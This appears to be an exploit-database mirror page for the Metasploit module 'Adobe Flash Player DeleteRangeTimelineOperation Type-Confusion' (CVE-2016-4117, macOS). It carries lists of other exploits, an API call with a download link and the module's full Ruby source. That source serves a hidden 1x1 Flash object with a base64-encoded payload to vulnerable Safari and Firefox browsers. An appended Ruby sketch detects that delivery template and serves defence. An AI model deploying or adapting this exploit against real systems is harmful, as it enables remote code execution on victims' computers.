
"Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)"

Author: Metasploit

Platform: osx

Release date: 2019-02-11

Release Date Title Type Platform Author
2019-02-11 "Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)" remote osx Metasploit
2016-09-09 "Airmail 3.0.2 - Cross-Site Scripting" webapps osx redrain
2016-12-16 "Horos 2.1.0 Web Portal - Directory Traversal" remote osx LiquidWorm
2015-10-26 "Apple Safari - User-Assisted Applescript Exec Attack (Metasploit)" remote osx Metasploit
2015-05-08 "MacKeeper - URL Handler Remote Code Execution" remote osx "Braden Thomas"
2011-03-09 "Apple QuickTime 7.5 - '.m3u' Remote Stack Buffer Overflow" remote osx KedAns-Dz
2010-03-26 "Apple Safari iPhone/iPod touch - Webpage Remote Code Execution" remote osx "Nishant Das Patnaik"
2010-03-26 "Apple Safari for iPhone/iPod touch - 'Throw' Exception Remote Code Execution" remote osx "Nishant Das Patnaik"
2008-07-11 "Apple iPhone / Apple iPod Touch < 2.0 - Multiple Remote Vulnerabilities" remote osx "Hiromitsu Takagi"
2008-04-21 "Apple iCal 3.0.1 - 'COUNT' Integer Overflow" remote osx "Core Security Technologies"
2008-03-22 "Apple Safari 3.1 - Window.setTimeout Variant Content Spoofing" remote osx "Juan Pablo Lopez Yacubian"
2008-03-17 "Apple Mac OSX Server 10.5 - Wiki Server Directory Traversal" remote osx "Rodrigo Carvalho"
2007-11-20 "Apple Mac OSX 10.5.x - Mail Arbitrary Code Execution" remote osx "heise Security"
2007-06-22 "Apple WebCore - XMLHTTPRequest Cross-Site Scripting" remote osx "Richard Moore"
2007-02-16 "Parallels - Drag and Drop Hidden Share" remote osx "Rich Mogull"
2007-01-12 "Apple Mac OSX 10.4.8 - DMG UFS Byte_Swap_Sbin() Integer Overflow" remote osx LMH
2006-09-26 "Skype Technologies Skype 1.5 - NSRunAlertPanel Remote Format String" remote osx "Tom Ferris"
2006-09-21 "Apple Mac OSX 10.x - AirPort Wireless Driver Multiple Buffer Overflow Vulnerabilities" remote osx "David Maynor"
2005-08-15 "Apple Mac OSX 10.4 Weblog Server - Cross-Site Scripting" remote osx "Donnie Werner"
2005-05-06 "4D WebSTAR 5.3/5.4 Tomcat Plugin - Remote Buffer Overflow" remote osx "Braden Thomas"
2005-05-04 "Apple Mac OSX 10.x - BlueTooth Directory Traversal" remote osx "Kevin Finisterre"
2004-11-01 "Apple Safari 1.2 Web Browser - TABLE Status Bar URI Obfuscation" remote osx "Gilbert Verdian"
2004-05-17 "Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution" remote osx "Troels Bay"
2004-03-10 "Apple Safari 1.x - Cookie Directory Traversal" remote osx "Corsaire Limited"
2003-05-22 "Apple QuickTime/Darwin Streaming MP3Broadcaster - ID3 Tag Handling" remote osx "Sir Mordred"
2002-07-08 "Apple Mac OSX 10.1.x - SoftwareUpdate Arbitrary Package Installation" remote osx "Russell Harding"
2002-01-22 "Apple Mac OS Internet Explorer 3/4/5 - File Execution" remote osx "Jass Seljamaa"
2001-06-26 "Apple Mac OSX 10 - nidump Password File Disclosure" remote osx "Steven Kreuzer"
2001-06-10 "Apache 1.3.14 - Mac File Protection Bypass" remote osx "Stefan Arentz"
2012-01-17 "Mozilla Firefox 3.6.16 (OSX) - mChannel Use-After-Free (Metasploit) (2)" remote osx Metasploit
Release Date Title Type Platform Author
2019-05-23 "Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-23 "Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)" local macos Metasploit
2019-05-20 "GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-08 "Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)" remote windows_x86 Metasploit
2019-05-02 "Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)" remote linux Metasploit
2019-04-30 "Pimcore < 5.71 - Unserialize RCE (Metasploit)" remote php Metasploit
2019-04-30 "AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)" remote windows Metasploit
2019-04-25 "RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)" local windows Metasploit
2019-04-19 "Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)" remote multiple Metasploit
2019-04-19 "SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)" local linux Metasploit
2019-04-18 "LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)" local multiple Metasploit
2019-04-15 "Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)" remote hardware Metasploit
2019-04-12 "Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)" remote linux Metasploit
2019-04-12 "Microsoft Windows - Contact File Format Arbitary Code Execution (Metasploit)" local windows Metasploit
2019-04-05 "WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)" remote php Metasploit
2019-04-03 "Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-03-28 "Oracle Weblogic Server Deserialization RCE - Raw Object (Metasploit)" remote multiple Metasploit
2019-03-28 "CMS Made Simple (CMSMS) Showtime2 - File Upload RCE (Metasploit)" remote php Metasploit
2019-03-19 "Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)" remote java Metasploit
2019-03-18 "BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)" remote multiple Metasploit
2019-03-13 "elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)" remote php Metasploit
2019-03-07 "Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)" remote php Metasploit
2019-03-07 "Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)" remote linux Metasploit
2019-03-07 "FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)" local freebsd_x86-64 Metasploit
2019-02-22 "Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)" remote windows Metasploit
2019-02-20 "Belkin Wemo UPnP - Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-02-11 "NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)" remote php Metasploit
2019-02-11 "Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)" remote osx Metasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46339/?format=json')
{"url": "https://www.nmmapper.com/api/exploitdetails/46339/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46339/40813/adobe-flash-player-deleterangetimelineoperation-type-confusion-metasploit/download/", "exploit_id": "46339", "exploit_description": "\"Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)\"", "exploit_date": "2019-02-11", "exploit_author": "Metasploit", "exploit_type": "remote", "exploit_platform": "osx", "exploit_port": null}

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info = {})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion',
      'Description'         => %q(
       This module exploits a type confusion on Adobe Flash Player, which was
       originally found being successfully exploited in the wild. This module
       has been tested successfully on:
         macOS Sierra 10.12.3,
         Safari and Adobe Flash Player 21.0.0.182,
         Firefox and Adobe Flash Player 21.0.0.182.
      ),
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Genwei Jiang', # FireEye original blog details on the vulnerability
          'bcook-r7'      # Imported Metasploit module
        ],
      'References'          =>
        [
          ['CVE', '2016-4117'],
          ['BID', '90505'],
          ['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'],
          ['URL', 'http://www.securitytracker.com/id/1035826'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'],
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => ['osx'],
      'BrowserRequirements' =>
        {
          source: /script|headers/i,
          os_name: lambda do |os|
            os =~ OperatingSystems::Match::MAC_OSX
          end,
          ua_name: lambda do |ua|
            case target.name
            when 'Mac OS X'
              return true if ua == Msf::HttpClients::SAFARI
              return true if ua == Msf::HttpClients::FF
            end

            false
          end,
          flash: lambda do |ver|
            case target.name
            when 'Mac OS X'
              return true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182')
            end

            false
          end
        },
      'Targets'             =>
        [
          [
            'Mac OS X', {
              'Platform' => 'osx',
              'Arch' => ARCH_X64
            }
          ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'Apr 27 2016',
      'DefaultTarget'       => 0))
  end

  def exploit
    @swf = create_swf

    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri.end_with? 'swf'
      print_status('Sending SWF...')
      send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache')
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache')
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(3..7)}.swf"
    target_payload = get_payload(cli, target_info)
    b64_payload = Rex::Text.encode_base64(target_payload)

    if target.name.include? 'osx'
      platform_id = 'osx'
    end
    html_template = %(<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>" Play="true"/>
    </object>
    </body>
    </html>
    )

    return html_template, binding
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf')
    File.binread(path)
  end
end
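
A detection-side sketch built from the module above, added here as an example and not part of the Metasploit module or the original page: it checks a captured HTML body for the traits of the module's delivery template (1x1 Flash object, `allowScriptAccess` set to `always`, a 3 to 7 letter `.swf` name, `FlashVars` of the form `sh=<base64>&pl=`) and compares an inventoried Flash Player version with the module's `21.0.0.182` ceiling. All function names, trait names and sample bodies are hypothetical and constructed for illustration.

```ruby
# Highest Flash Player version accepted by the module's `flash:` requirement.
MODULE_MAX_FLASH = Gem::Version.new('21.0.0.182')

# True when an inventoried Flash version is one the module would serve.
def flash_in_module_range?(version)
  Gem::Version.new(version) <= MODULE_MAX_FLASH
rescue ArgumentError
  true # unparseable inventory value: keep it in scope for manual review
end

# Values of attribute `name`, from <param name="X" value="V"> or inline X="V".
def attr_values(html, name)
  html.scan(/\b#{Regexp.escape(name)}"?\s*(?:value)?\s*=\s*"([^"]*)"/i).flatten
end

# FlashVars shaped like the template's sh=<base64>&pl=<platform>.
def payload_flashvars?(value)
  m = value.match(/\Ash=([A-Za-z0-9+\/=]+)&(?:amp;)?pl=/)
  return false unless m
  m[1].unpack1('m0') # strict Base64 decode, raises ArgumentError if invalid
  true
rescue ArgumentError
  false
end

# Names of the template traits present in a captured HTML response body.
def flash_template_traits(html)
  traits = []
  tags = html.scan(/<(?:object|embed)\b[^>]*>/i)
  hidden = tags.any? { |t| t.match?(/\bwidth="1"/i) && t.match?(/\bheight="1"/i) }
  traits << :hidden_1x1 if hidden
  access = attr_values(html, 'allowScriptAccess')
  traits << :script_access_always if access.any? { |v| v.casecmp?('always') }
  movies = attr_values(html, 'movie') + attr_values(html, 'src')
  traits << :short_alpha_swf if movies.any? { |v| v.match?(/\A[A-Za-z]{3,7}\.swf\z/) }
  traits << :flashvars_sh_pl if attr_values(html, 'FlashVars').any? { |v| payload_flashvars?(v) }
  traits
end

# Combine proxy-side and inventory-side evidence for one client.
def triage(html, flash_version)
  traits = flash_template_traits(html)
  { traits: traits, template_match: traits.size == 4,
    endpoint_in_range: flash_in_module_range?(flash_version) }
end

# Constructed sample bodies (not captured traffic).
SAMPLE_HIT = '<object width="1" height="1" /><param name="movie" value="qWxyZ.swf" />' \
  '<param name="allowScriptAccess" value="always" /><param name="FlashVars" value="sh=Y29uc3RydWN0ZWQ=&pl=" /></object>'
SAMPLE_BENIGN = '<embed width="640" height="360" src="player.swf" ' \
  'allowScriptAccess="sameDomain" FlashVars="video=intro.mp4"/>'
```

A single trait, such as the short `.swf` name in the benign sample, is common on legitimate pages; only the full combination is treated as a template match.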